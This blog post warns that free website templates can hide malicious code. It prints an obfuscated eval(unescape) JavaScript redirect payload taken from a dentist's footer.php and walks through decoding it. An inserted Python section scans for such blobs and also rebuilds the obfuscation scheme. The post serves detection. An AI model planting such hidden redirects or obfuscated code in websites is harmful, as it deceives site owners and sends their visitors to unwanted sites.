Nov 1
Beware of Free Templates

by chicagohh

Over the last 5 years, content management systems (WordPress, Joomla, etc.) have become perhaps the most popular platforms for launching new websites. Before these well-developed CMS solutions, nearly all websites were written from scratch. Alongside the CMS, a very strong aftermarket for building templates has grown. These templates allow anyone to build and launch a very nice looking website cheaply and quickly. You can even find websites that give away free templates, and others that give away popular templates you would normally have to pay for. As usual, the old adage holds true when it comes to getting something for free.

Hidden Links to P*rn, Casinos or Worse

I first noticed a hack specifically designed for WordPress templates (it works on any PHP template) back in 2008. I was hired to increase leads for a Chicago dentist. They had a wonderful looking website with tons of great content, but they couldn’t rank in the search engines, not even for their own name. They had hired a local web development company (one that happened to specialize in dentists) to build their website. On paper it looked like they had made a good decision, but something was terribly wrong.

Very quickly, using a few tools that I developed, I was able to uncover hidden links on every page of this dentist’s website. Each page of her site had three links: one pointed to a German p*rn website, a second pointed to an online casino company, and the third pointed… well, I won’t say here (you can contact me if you’re really curious). Needless to say, Google, Yahoo and Bing concluded (rightly so) that this dentist was promoting these other websites. Not. Good.

The code that created the links was partly hidden. You couldn’t see the links by looking at the website in your browser, or even by viewing the page source. The software that built the links was smart enough to serve them only to the major search engines’ crawlers. So the dentist never knew they existed, and even the developer who built her site didn’t know they existed.

Recently, another client reached out to me with the same problem, so I thought I would share how to find this hacked code.

How Do You Find It?

You need to be able to look at the source code of your website. If it’s a WordPress site, this code will almost always be found in the footer.php file or something similar. The code is also encoded, so that it looks like a neat, innocent block of code that might be needed. I think this is why so many developers ignore it.

Here is a snapshot of what the most recent code I found looked like:

eval(unescape('%76%61%72%20%6e%78%36%61%3d%27%70%2e%6c%6f%63%27%3b%20%76%61%72%20%74%31%71%65%3d%27%6f%6e%29%20%7b%27%3b%20%76%61%72%20%77%68%30%73%63%75%3d%27%62%35%64%66%22%3b%20%27%3b%20%76%61%72%20%78%68%66%34%65%75%3d%27%77%2e%74%61%6d%62%61%6c%61%2e%69%27%3b%20%76%61%72%20%75%65%76%32%3d%27%77%27%3b%20%76%61%72%20%69%76%78%61%38%3d%27%7d%20%27%3b%20%76%61%72%20%79%36%6b%6b%3d%27%7d%20%27%3b%20%76%61%72%20%65%6b%77%71%35%3d%27%2e%6c%6f%27%3b%20%76%61%72%20%6e%64%6f%69%30%61%3d%27%67%2f%69%6e%64%65%78%2e%70%68%70%3f%6d%6e%3d%38%37%33%38%39%33%26%73%69%74%65%27%3b%20%76%61%72%20%70%7a%6a%38%3d%27%6f%6f%64%77%6f%72%6b%27%3b%20%76%61%72%20%66%62%30%63%61%3d%27%61%72%20%76%70%6b%72%66%30%3d%27%3d%20%73%65%6c%66%2e%6c%6f%63%61%74%69%27%3b%20%76%61%3b%20%65%76%61%6c%28%62%39%6f%70%70%66%2b%6e%78%36%61%2b%75%7a%33%74%6c%61%2b%66%62%30%63%61%2b%76%70%6b%72%66%30%2b%74%31%71%65%2b%73%61%33%75%71%73%2b%72%32%63%62%2b%77%66%75%66%33%2b%6a%72%34%6b%2b%79%36%6b%6b%2b%6c%71%6d%73%37%2b%62%76%69%64%75%35%2b%65%6b%77%71%35%2b%63%36%74%30%74%6c%2b%66%6f%39%6b%6d%2b%78%68%66%34%65%75%2b%6b%35%76%70%2b%75%65%76%32%2b%70%7a%6a%38%2b%76%65%74%32%2b%6e%64%6f%69%30%61%2b%7a%6c%78%38%6c%2b%77%68%30%73%63%75%2b%69%76%78%61%38%29%3b'));

What a mess, huh? It’s no wonder most people ignore it.  It took me several steps to decode it. At first I found what looked like meaningless stuff:

var nx6a='p.loc'; var t1qe='on) {'; var wh0scu='b5df"; '; var xhf4eu='w.tambala.i'; var uev2='w'; var ivxa8='} '; var y6kk='}

But if you look closely, you can see that most of those chunks of text begin with var, which is how you declare a variable in JavaScript. Lastly, there was this:

eval(b9oppf+nx6a+uz3tla+fb0ca…

These were instructions to concatenate all those variables and then run whatever they spelled out as JavaScript. Reassembled, it read:

if (top.location != self.location) { top.location = self.location.href; } else { window.location = "TheBadWebSite"; }

In this case, the code was actually sending some, but not all, visitors to a *different* website. Yikes. It wasn’t until the business owner (another dentist) started hearing from many patients that their website was broken that they contacted me.
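The decoding steps above can be done statically, without ever running the script. The following Python scanner is an added example (not the post's own tooling): it finds eval(unescape('...')) in a template, undoes the %XX layer, and resolves the var-chunk concatenation that the inner eval() would have executed. The footer contents, the junk variable names and the redirect URL are constructed samples modelled on the pattern described in the post.

```python
import re

# Constructed sample payload (not the post's blob); the URL is a placeholder.
PAYLOAD = ('if (top.location != self.location) { top.location = self.location.href; }'
           ' else { window.location = "http://redirect.example"; }')

def obfuscate(payload, chunk=7):
    """Rebuild the two-layer scheme from the post for the constructed sample:
    split the payload into var chunks in scrambled order, eval() their
    concatenation, then %XX-encode the whole thing behind eval(unescape())."""
    pieces = [payload[i:i + chunk] for i in range(0, len(payload), chunk)]
    names = ['v%d' % i for i in range(len(pieces))]
    decls = ["var %s='%s';" % (n, p) for n, p in zip(names, pieces)]  # sample has no quotes
    inner = ' '.join(reversed(decls)) + ' eval(' + '+'.join(names) + ');'
    return "eval(unescape('" + ''.join('%%%02x' % ord(c) for c in inner) + "'));"

# Constructed footer.php content carrying the injected script.
FOOTER_PHP = ('<?php wp_footer(); ?>\n<script type="text/javascript">\n'
              + obfuscate(PAYLOAD) + '\n</script>\n</body></html>\n')

def js_unescape(s):
    """Mirror JavaScript's unescape(): %uXXXX and %XX sequences become characters."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)

def decode_layer(js):
    """Resolve var chunks and the eval(a+b+...) concatenation statically.
    Returns the string eval would have run, or None if a name is unknown."""
    chunks = dict(re.findall(r"var\s+(\w+)\s*=\s*'([^']*)'\s*;", js))
    m = re.search(r'eval\(\s*([\w+\s]+?)\s*\)', js)
    if not m:
        return None
    names = [n.strip() for n in m.group(1).split('+')]
    if not all(n in chunks for n in names):
        return None
    return ''.join(chunks[n] for n in names)

def scan_template(source):
    """Find every eval(unescape('...')) in a template and decode it without
    executing anything; fall back to the first layer if the second is unknown."""
    found = []
    for m in re.finditer(r"eval\(\s*unescape\(\s*['\"]([^'\"]*)['\"]\s*\)\s*\)", source):
        layer1 = js_unescape(m.group(1))
        found.append(decode_layer(layer1) or layer1)
    return found

if __name__ == '__main__':
    for script in scan_template(FOOTER_PHP):
        print('decoded:', script)
```

Point scan_template() at the contents of footer.php (or any template file) and review whatever it prints; a clean template yields an empty list.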

How Did It Happen?

It happened because the web developer that was hired used a free template as the starting point for the website. Like so many developers nowadays, they were not really programmers at all. In this case the developer was a talented designer, meaning they created very nice looking pages, but they didn’t know how the code really worked. Oops.

They also didn’t know how to get visitors to do anything on the site like call the dentist, email or use a form… but that is another story.
